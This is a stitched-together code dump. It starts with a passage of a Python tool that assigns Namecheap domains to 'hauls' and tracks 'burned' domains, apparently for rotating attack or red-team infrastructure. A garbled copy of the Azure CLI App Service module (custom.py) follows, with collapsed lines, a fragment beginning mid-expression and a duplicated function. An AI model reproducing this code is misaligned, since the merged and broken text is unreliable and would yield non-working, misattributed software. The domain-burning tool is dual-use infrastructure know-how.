                if len(actual_domains) < len(domains_types):
                    print("[+] You don't have enough domains for each haul. Buy another domain")
                    sys.exit()
                print("[+] You are configuring the following haul's: ")
                for i in domains_types:
                    print("[+] " + i)
                print("")
                for k in domains_types:
                    actual_domains = set(domains) - set(domains_in_use) - set(burned_domains)
                    print("[+] Select one of the available domains to move to the haul "+k)
                    if len(actual_domains) > 0:
                        for index, item in enumerate(actual_domains):
                            print(str(index) + ") " + item)
                        domain_option = input("Option: ")
                        # Re-prompt while the chosen domain already sits in a haul.
                        worked = False
                        while worked == False:
                            worked = True
                            for i in domains_types:
                                if domain_option in domains_types[i]:
                                    print("Domain is already present in haul" +i)
                                    print("Select another domain")
                                    domain_option = input("Option: ")
                                    worked = False
                        print("Moving domain to haul "+k)
                        actual_domains = list(actual_domains)
                        domains_types[k].append(actual_domains[int(domain_option)])
                        domains.remove(actual_domains[int(domain_option)])
        except Exception as e:
            print(e)
        # NOTE(review): reconstructed at loop level (menu runs once) --
        # confirm placement against the original source.
        check = True


def main():
    """Entry point: validate API keys, load domains from Namecheap, restore
    or bootstrap state, then run the monitor and menu threads."""
    global domains_long,domains_short, domains, api,message_queu,backup_restored,domains_types
    digital_ocean_token = config.digital_ocean_token
    message_queu["action1"] = []
    message_queu["action2"] = []
    message_queu["action3"] = []
    message_queu["action4"] = []
    message_queu["action5"] = []
    message_queu["action6"] = []
    message_queu["action7"] = []
    if config.namecheap_key == "":
        print(f"{bcolors.FAIL}[+] Namecheap API Key missing{bcolors.ENDC}")
        sys.exit()
    if config.apivoid_key == "":
        print(f"{bcolors.FAIL}[+] APIVoid API Key missing{bcolors.ENDC}")
        sys.exit(0)
    api = Api(config.namecheap_username, config.namecheap_key, config.namecheap_ipaddress, sandbox=False)
    for i in config.names:
        domains_types[i] = config.names[i]
    temp_domains = list(api.domains_getList())
    backup_restored = check_backup()
    for i in temp_domains:
        domains.append(i['name'])
    # Fall back to the restricted first-run menu when any haul is empty.
    check_names = True
    for i in config.names:
        if len(config.names[i]) == 0:
            check_names = False
            break
    if check_names == False:
        check_names = True
        for i in domains_types:
            if len(domains_types[i]) == 0:
                print("[+] No domains found in haul "+ i)
                check_names = False
    if check_names == False:
        restricted_menu()
    thread = Thread(target=set_and_check)
    thread.start()
    thread2 = Thread(target=menu)
    thread2.start()
    thread.join()
    thread2.join()


main()
custom.py
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from __future__ import print_function import threading import time import ast try: from urllib.parse import urlparse except ImportError: from urlparse import urlparse # pylint: disable=import-error from binascii import hexlify from os import urandom import datetime import json import ssl import sys import uuid from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports import OpenSSL.crypto from fabric import Connection from knack.prompting import prompt_pass, NoTTYException from knack.util import CLIError from knack.log import get_logger from msrestazure.azure_exceptions import CloudError from msrestazure.tools import is_valid_resource_id, parse_resource_id from azure.mgmt.storage import StorageManagementClient from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient from azure.mgmt.relay.models import AccessRights from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory from azure.storage.blob import BlockBlobService, BlobPermissions from azure.cli.command_modules.network._client_factory import network_client_factory from azure.cli.core.commands.client_factory import get_mgmt_service_client from azure.cli.core.commands import LongRunningOperation from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \ ConfiguredDefaultSetter, sdk_no_wait from azure.cli.core.commands.client_factory import UA_AGENT from azure.cli.core.profiles import ResourceType from .tunnel import TunnelServer from .vsts_cd_provider import VstsContinuousDeliveryProvider from ._params 
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES, LINUX_RUNTIMES, WINDOWS_RUNTIMES
from ._client_factory import web_client_factory, ex_handler_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group,
                           get_app_details, should_create_new_rg, set_location, does_app_already_exist,
                           get_profile_username, get_plan_to_use, get_lang_from_content, get_rg_to_use,
                           get_sku_to_use, detect_os_form_src)
from ._constants import (RUNTIME_TO_DEFAULT_VERSION_FUNCTIONAPP, NODE_VERSION_DEFAULT_FUNCTIONAPP,
                         RUNTIME_TO_IMAGE_FUNCTIONAPP, NODE_VERSION_DEFAULT)

logger = get_logger(__name__)

# pylint:disable=no-member,too-many-lines,too-many-locals

# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"


def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None,  # pylint: disable=too-many-statements,too-many-branches
                  deployment_container_image_name=None, deployment_source_url=None,
                  deployment_source_branch='master', deployment_local_git=None,
                  docker_registry_server_password=None, docker_registry_server_user=None,
                  multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
                  using_webapp_up=False, language=None):
    """Create a web app on an existing App Service plan.

    Resolves the plan (by resource id or by name in the resource group), builds a
    Site/SiteConfig pair appropriate for the plan's OS (linux / windows container /
    windows runtime), then issues create_or_update and wires up source control,
    FTP publishing URL and (if given) container settings.

    :raises CLIError: for conflicting deployment options, a missing plan, or an
        unsupported runtime.
    """
    SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
        'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
    # --deployment-source-url and --deployment-local-git are mutually exclusive
    if deployment_source_url and deployment_local_git:
        raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
    docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
    client = web_client_factory(cmd.cli_ctx)
    # The plan may be passed either as a full ARM resource id or as a bare name.
    if is_valid_resource_id(plan):
        parse_result = parse_resource_id(plan)
        plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
    else:
        plan_info = client.app_service_plans.get(resource_group_name, plan)
    if not plan_info:
        raise CLIError("The plan '{}' doesn't exist".format(plan))
    is_linux = plan_info.reserved  # 'reserved' flags a Linux plan in the ARM model
    node_default_version = NODE_VERSION_DEFAULT
    location = plan_info.location
    site_config = SiteConfig(app_settings=[])
    # always_on is unsupported on Free/Shared/Basic tiers, so only enable it above those.
    if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
                                                                                       'B1', 'B2', 'B3', 'BASIC']:
        site_config.always_on = True
    webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
                      https_only=using_webapp_up)
    helper = _StackRuntimeHelper(cmd, client, linux=is_linux)

    if is_linux:
        if not validate_container_app_create_options(runtime, deployment_container_image_name,
                                                     multicontainer_config_type, multicontainer_config_file):
            raise CLIError("usage error: --runtime | --deployment-container-image-name |"
                           " --multicontainer-config-type TYPE --multicontainer-config-file FILE")
        if startup_file:
            site_config.app_command_line = startup_file

        if runtime:
            site_config.linux_fx_version = runtime
            match = helper.resolve(runtime)
            if not match:
                raise CLIError("Linux Runtime '{}' is not supported."
                               "Please invoke 'list-runtimes' to cross check".format(runtime))
        elif deployment_container_image_name:
            site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
            # custom container: disable the shared content volume
            site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
                                                          value="false"))
        elif multicontainer_config_type and multicontainer_config_file:
            encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
            site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)

    elif plan_info.is_xenon:  # windows container webapp
        site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)

    elif runtime:  # windows webapp with runtime specified
        if any([startup_file, deployment_container_image_name, multicontainer_config_file,
                multicontainer_config_type]):
            raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
                           "--multicontainer-config-type and --multicontainer-config-file is "
                           "only appliable on linux webapp")
        match = helper.resolve(runtime)
        if not match:
            raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime))  # pylint: disable=line-too-long
        match['setter'](cmd=cmd, stack=match, site_config=site_config)
        # Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
        if not match['displayName'].startswith('node'):
            site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
                                                          value=node_default_version))
    else:  # windows webapp without runtime specified
        site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
                                                      value=node_default_version))

    if site_config.app_settings:
        for setting in site_config.app_settings:
            logger.info('Will set appsetting %s', setting)
    if using_webapp_up:  # when the routine is invoked as a help method for webapp up
        logger.info("will set appsetting for enabling build")
        site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
    if language is not None and language.lower() == 'dotnetcore':
        site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
                                                      value='https://{}.scm.azurewebsites.net/detectors'.format(name)))

    poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
    webapp = LongRunningOperation(cmd.cli_ctx)(poller)

    # Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
    _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
                             deployment_source_branch, deployment_local_git)
    _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)

    if deployment_container_image_name:
        update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
                                  deployment_container_image_name, docker_registry_server_user,
                                  docker_registry_server_password=docker_registry_server_password)

    return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
                                          multicontainer_config_type=None, multicontainer_config_file=None):
    """Return True when exactly one valid container/runtime option set was supplied.

    A multicontainer configuration is only valid when both its type and file are
    given together; runtime, container image and multicontainer config are
    mutually exclusive — exactly one of them must be present.
    """
    if bool(multicontainer_config_type) != bool(multicontainer_config_file):
        return False
    exclusive_options = (runtime, deployment_container_image_name, multicontainer_config_type)
    return sum(1 for option in exclusive_options if option) == 1  # you can only specify one out the combinations


def parse_docker_image_name(deployment_container_image_name):
    """Extract the registry server portion of a container image name.

    Returns the registry host (the part before the last '/') only when it looks
    like a real registry (contains '.' or ':'); otherwise None, meaning the image
    comes from the default registry (e.g. Docker Hub).
    """
    if not deployment_container_image_name:
        return None
    registry, sep, _ = deployment_container_image_name.rpartition('/')
    if not sep:
        return None
    if '.' not in registry and ':' not in registry:
        return None
    return registry


def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
    """Add or update application settings on a web app (optionally on a slot).

    Each entry may be a ``KEY=VALUE`` string or JSON (including the output of the
    'list' command); entries passed via --slot-settings are additionally marked
    slot-sticky in the slot configuration names.
    """
    if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings |--slot-settings')

    settings = settings or []
    slot_settings = slot_settings or []

    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_application_settings', slot)
    result, slot_result = {}, {}
    # pylint: disable=too-many-nested-blocks
    for source_list, target in [(settings, result), (slot_settings, slot_result)]:
        for raw_entry in source_list:
            try:
                parsed = shell_safe_json_parse(raw_entry)
                if isinstance(parsed, list):  # a bit messy, but we'd like accept the output of the "list" command
                    for item in parsed:
                        if item.get('slotSetting', True):
                            # Mark each setting as the slot setting
                            slot_result[item['name']] = item['value']
                        else:
                            result[item['name']] = item['value']
                else:
                    target.update(parsed)
            except CLIError:
                # Not JSON — treat as a plain KEY=VALUE pair.
                setting_name, value = raw_entry.split('=', 1)
                target[setting_name] = value

    result.update(slot_result)
    for setting_name, value in result.items():
        app_settings.properties[setting_name] = value
    client = web_client_factory(cmd.cli_ctx)

    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_application_settings',
                                         app_settings.properties, slot, client)

    app_settings_slot_cfg_names = []
    if slot_result:
        new_slot_setting_names = slot_result.keys()
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
        slot_cfg_names.app_setting_names += new_slot_setting_names
        app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)

    return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)


def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
                              share_name, access_key, mount_path=None, slot=None, slot_setting=False):
    """Attach a new Azure storage account mount to a web app.

    :raises CLIError: if a configuration with ``custom_id`` already exists
        (use 'az webapp config storage-account update' instead).
    """
    AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
    azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                     'list_azure_storage_accounts', slot)
    if custom_id in azure_storage_accounts.properties:
        raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
                       "Use 'az webapp config storage-account update' to update an existing "
                       "Azure storage account configuration.".format(custom_id))

    azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type,
                                                                         account_name=account_name,
                                                                         share_name=share_name,
                                                                         access_key=access_key,
                                                                         mount_path=mount_path)
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts',
                                         azure_storage_accounts.properties, slot, client)

    if slot_setting:
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
        if custom_id not in slot_cfg_names.azure_storage_config_names:
            slot_cfg_names.azure_storage_config_names.append(custom_id)
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)

    return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
                                 share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
    """Update an existing Azure storage account mount on a web app.

    Any field left as None keeps its previous value; the entry is re-created
    from the merged old/new values. With ``slot_setting=True`` the id is also
    marked slot-sticky.

    :raises CLIError: if no configuration with ``custom_id`` exists.
    """
    AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
    azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                     'list_azure_storage_accounts', slot)
    # pop() removes the old entry; it is re-added below with merged values.
    existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
    if not existing_account_config:
        raise CLIError("No Azure storage account configuration found with the id '{}'. "
                       "Use 'az webapp config storage-account add' to add a new "
                       "Azure storage account configuration.".format(custom_id))

    new_account_config = AzureStorageInfoValue(
        type=storage_type or existing_account_config.type,
        account_name=account_name or existing_account_config.account_name,
        share_name=share_name or existing_account_config.share_name,
        access_key=access_key or existing_account_config.access_key,
        mount_path=mount_path or existing_account_config.mount_path
    )

    azure_storage_accounts.properties[custom_id] = new_account_config

    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts',
                                         azure_storage_accounts.properties, slot, client)

    if slot_setting:
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
        if custom_id not in slot_cfg_names.azure_storage_config_names:
            slot_cfg_names.azure_storage_config_names.append(custom_id)
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)

    return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
    """Zip-deploy ``src`` to a function app, choosing the right deployment path.

    Consumption-plan Linux apps without remote build are uploaded to storage
    (run-from-package); otherwise the kudu zipdeploy endpoint is used, with the
    remote-build app settings toggled to match ``build_remote``.

    :raises CLIError: if the app does not exist, or remote build is requested
        on a non-Linux app.
    """
    client = web_client_factory(cmd.cli_ctx)
    app = client.web_apps.get(resource_group_name, name)
    if app is None:
        raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
                       'Please make sure these values are correct.'.format(name, resource_group_name))
    parse_plan_id = parse_resource_id(app.server_farm_id)
    plan_info = None
    retry_delay = 10  # seconds
    # We need to retry getting the plan because sometimes if the plan is created as part of function app,
    # it can take a couple of tries before it gets the plan
    for _ in range(5):
        plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
                                                 parse_plan_id['name'])
        if plan_info is not None:
            break
        time.sleep(retry_delay)

    if build_remote and not app.reserved:
        raise CLIError('Remote build is only available on Linux function apps')

    is_consumption = is_plan_consumption(cmd, plan_info)
    if (not build_remote) and is_consumption and app.reserved:
        return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)

    if build_remote:
        add_remote_build_app_settings(cmd, resource_group_name, name, slot)
    else:
        remove_remote_build_app_settings(cmd, resource_group_name, name, slot)

    return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)


def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
    """Zip-deploy ``src`` to a web app via the kudu zipdeploy endpoint."""
    return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
should_disable_connection_verify # Read file content with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs: zip_content = fs.read() logger.warning("Starting zip deployment. This operation can take a while to complete ...") res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify()) logger.warning("Deployment endpoint responded with status code %d", res.status_code) # check if there's an ongoing process if res.status_code == 409: raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. " "Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting " "is removed.".format(deployment_status_url)) # check the status of async deployment response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url, authorization, timeout) return response def add_remote_build_app_settings(cmd, resource_group_name, name, slot): settings = get_app_settings(cmd, resource_group_name, name, slot) enable_oryx_build = None scm_do_build_during_deployment = None website_run_from_package = None for keyval in settings: value = keyval['value'].lower() if keyval['name'] == 'ENABLE_ORYX_BUILD': enable_oryx_build = value in ('true', '1') if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT': scm_do_build_during_deployment = value in ('true', '1') if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE': website_run_from_package = value if not ((enable_oryx_build is True) and (scm_do_build_during_deployment is True)): logger.warning("Setting ENABLE_ORYX_BUILD to true") logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true") update_app_settings(cmd, resource_group_name, name, [ "ENABLE_ORYX_BUILD=true", "SCM_DO_BUILD_DURING_DEPLOYMENT=true" ], slot) time.sleep(5) if website_run_from_package is not None: logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting") delete_app_settings(cmd, resource_group_name, name, [ 
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
    """Ensure app settings required for kudu remote (Oryx) build are in place.

    Sets ENABLE_ORYX_BUILD / SCM_DO_BUILD_DURING_DEPLOYMENT to true and removes
    WEBSITE_RUN_FROM_PACKAGE, which conflicts with remote build. The sleeps give
    the settings time to propagate before deployment starts.
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    enable_oryx_build = None
    scm_do_build_during_deployment = None
    website_run_from_package = None

    for keyval in settings:
        value = keyval['value'].lower()
        if keyval['name'] == 'ENABLE_ORYX_BUILD':
            enable_oryx_build = value in ('true', '1')
        if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
            scm_do_build_during_deployment = value in ('true', '1')
        if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
            website_run_from_package = value

    if not ((enable_oryx_build is True) and (scm_do_build_during_deployment is True)):
        logger.warning("Setting ENABLE_ORYX_BUILD to true")
        logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
        update_app_settings(cmd, resource_group_name, name, [
            "ENABLE_ORYX_BUILD=true",
            "SCM_DO_BUILD_DURING_DEPLOYMENT=true"
        ], slot)
        time.sleep(5)

    if website_run_from_package is not None:
        logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
        delete_app_settings(cmd, resource_group_name, name, [
            "WEBSITE_RUN_FROM_PACKAGE"
        ], slot)
        time.sleep(5)


def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
    """Explicitly disable kudu remote (Oryx) build before a plain zip deploy.

    Sets ENABLE_ORYX_BUILD / SCM_DO_BUILD_DURING_DEPLOYMENT to false unless
    both are already false.
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    enable_oryx_build = None
    scm_do_build_during_deployment = None

    for keyval in settings:
        value = keyval['value'].lower()
        if keyval['name'] == 'ENABLE_ORYX_BUILD':
            enable_oryx_build = value in ('true', '1')
        if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
            scm_do_build_during_deployment = value in ('true', '1')

    if not ((enable_oryx_build is False) and (scm_do_build_during_deployment is False)):
        logger.warning("Setting ENABLE_ORYX_BUILD to false")
        logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
        update_app_settings(cmd, resource_group_name, name, [
            "ENABLE_ORYX_BUILD=false",
            "SCM_DO_BUILD_DURING_DEPLOYMENT=false"
        ], slot)
        time.sleep(5)
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
    """Upload a deployment zip to the app's AzureWebJobsStorage account and set
    WEBSITE_RUN_FROM_PACKAGE to a long-lived (10-year) read-only SAS url, then
    sync the function triggers.

    :raises CLIError: if the app has no 'AzureWebJobsStorage' setting.
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)

    storage_connection = None
    for keyval in settings:
        if keyval['name'] == 'AzureWebJobsStorage':
            storage_connection = str(keyval['value'])

    if storage_connection is None:
        raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')

    container_name = "function-releases"
    blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
    block_blob_service = BlockBlobService(connection_string=storage_connection)
    if not block_blob_service.exists(container_name):
        block_blob_service.create_container(container_name)

    # https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
    def progress_callback(current, total):
        total_length = 30
        # NOTE(review): parenthesization differs from the referenced gist
        # (round() wraps only the product); for integer byte counts the result
        # is effectively the truncated fill width — confirm before changing.
        filled_length = int(round(total_length * current) / float(total))
        percents = round(100.0 * current / float(total), 1)
        progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
        progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
        cmd.cli_ctx.get_progress_controller().add(message=progress_message)

    block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
                                             progress_callback=progress_callback)

    now = datetime.datetime.now()
    blob_start = now - datetime.timedelta(minutes=10)  # back-dated to tolerate clock skew
    blob_end = now + datetime.timedelta(weeks=520)     # ~10 years
    blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
                                                                          blob_name,
                                                                          permission=BlobPermissions(read=True),
                                                                          expiry=blob_end,
                                                                          start=blob_start)

    blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
    website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
    update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
    client = web_client_factory(cmd.cli_ctx)

    try:
        logger.info('\nSyncing Triggers...')
        if slot is not None:
            client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
        else:
            client.web_apps.sync_function_triggers(resource_group_name, name)
    except CloudError as ce:
        # This SDK function throws an error if Status Code is 200
        if ce.status_code != 200:
            raise ce


def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
                                setting_properties, slot=None, client=None):
    """Dispatch a settings update to the slot or non-slot SDK operation.

    NOTE(review): the bare ``str`` is passed positionally (apparently as the
    SDK's 'kind' parameter) — matches the surrounding call sites; confirm
    against the installed azure-mgmt-web signature before changing.
    """
    client = client or web_client_factory(cli_ctx)
    operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
    if slot is None:
        return operation(resource_group_name, name, str, setting_properties)
    return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
    """Return the web app resource, with renamed plan property and FTP url filled in.

    ``app_instance`` lets helper callers supply an already-fetched Site and skip
    the GET round-trip.
    """
    webapp = app_instance
    if not app_instance:  # when the routine is invoked as a help method, not through commands
        webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(name))
    _rename_server_farm_props(webapp)
    _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
    return webapp


# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
    """Fetch the raw Site resource (generic-update getter)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)


def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
               skip_custom_domain_verification=None, force_dns_registration=None,
               ttl_in_seconds=None, **kwargs):
    """Write back a Site resource (generic-update setter), slot-aware."""
    instance = kwargs['parameters']
    client = web_client_factory(cmd.cli_ctx)
    updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
    call_args = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
                     skip_dns_registration=skip_dns_registration,
                     skip_custom_domain_verification=skip_custom_domain_verification,
                     force_dns_registration=force_dns_registration,
                     ttl_in_seconds=ttl_in_seconds)
    if slot:
        call_args['slot'] = slot
    return updater(**call_args)


def update_webapp(instance, client_affinity_enabled=None, https_only=None):
    """Apply 'true'/'false' string flags onto a Site instance and return it.

    Refuses to operate on function apps (``'function'`` in the resource kind).
    """
    if 'function' in instance.kind:
        raise CLIError("please use 'az functionapp update' to update this function app")
    if client_affinity_enabled is not None:
        instance.client_affinity_enabled = (client_affinity_enabled == 'true')
    if https_only is not None:
        instance.https_only = (https_only == 'true')
    return instance


def update_functionapp(cmd, instance, plan=None):
    """Optionally move a function app to another plan (validated for compatibility)."""
    client = web_client_factory(cmd.cli_ctx)
    if plan is not None:
        if is_valid_resource_id(plan):
            dest_parse_result = parse_resource_id(plan)
            dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
                                                          dest_parse_result['name'])
        else:
            dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
        if dest_plan_info is None:
            raise CLIError("The plan '{}' doesn't exist".format(plan))
        validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info)
        instance.server_farm_id = dest_plan_info.id
    return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance):
    """Raise CLIError unless both the current and destination plans are
    Consumption or Elastic Premium (the only allowed switch combination)."""
    general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
    src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
    src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
                                                 src_parse_result['name'])
    if src_plan_info is None:
        raise CLIError('Could not determine the current plan of the functionapp')
    if not (is_plan_consumption(cmd, src_plan_info) or is_plan_elastic_premium(cmd, src_plan_info)):
        raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
                       general_switch_msg)
    if not (is_plan_consumption(cmd, dest_plan_instance) or is_plan_elastic_premium(cmd, dest_plan_instance)):
        raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
                       general_switch_msg)


def set_functionapp(cmd, resource_group_name, name, **kwargs):
    """Write back a function app Site (generic-update setter); rejects non-function apps."""
    instance = kwargs['parameters']
    if 'function' not in instance.kind:
        raise CLIError('Not a function app to update')
    client = web_client_factory(cmd.cli_ctx)
    return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)


def list_webapp(cmd, resource_group_name=None):
    """List web apps (excludes function apps by resource kind)."""
    result = _list_app(cmd.cli_ctx, resource_group_name)
    return [r for r in result if 'function' not in r.kind]


def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
    """List soft-deleted apps, sorted by deleted-site id."""
    result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
    return sorted(result, key=lambda site: site.deleted_site_id)


def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
    """Restore a soft-deleted app into the target app/slot.

    ``restore_content_only`` skips restoring configuration (recover_configuration
    is the negation of it).
    """
    DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
    request = DeletedAppRestoreRequest(deleted_site_id=deleted_id,
                                       recover_configuration=not restore_content_only)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app',
                                   slot, request)
def list_function_app(cmd, resource_group_name=None):
    """List function apps (filters by 'function' in the resource kind)."""
    result = _list_app(cmd.cli_ctx, resource_group_name)
    return [r for r in result if 'function' in r.kind]


def _list_app(cli_ctx, resource_group_name=None):
    """List all site resources, subscription-wide or per resource group,
    with the server_farm_id property renamed for display."""
    client = web_client_factory(cli_ctx)
    if resource_group_name:
        result = list(client.web_apps.list_by_resource_group(resource_group_name))
    else:
        result = list(client.web_apps.list())
    for webapp in result:
        _rename_server_farm_props(webapp)
    return result


def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
    """Collect soft-deleted apps across all deleted-app locations, then filter
    by resource group, site name and slot (name/slot compared case-insensitively)."""
    client = web_client_factory(cli_ctx)
    locations = _get_deleted_apps_locations(cli_ctx)
    result = list()
    for location in locations:
        result = result + list(client.deleted_web_apps.list_by_location(location))
    if resource_group_name:
        result = [r for r in result if r.resource_group == resource_group_name]
    if name:
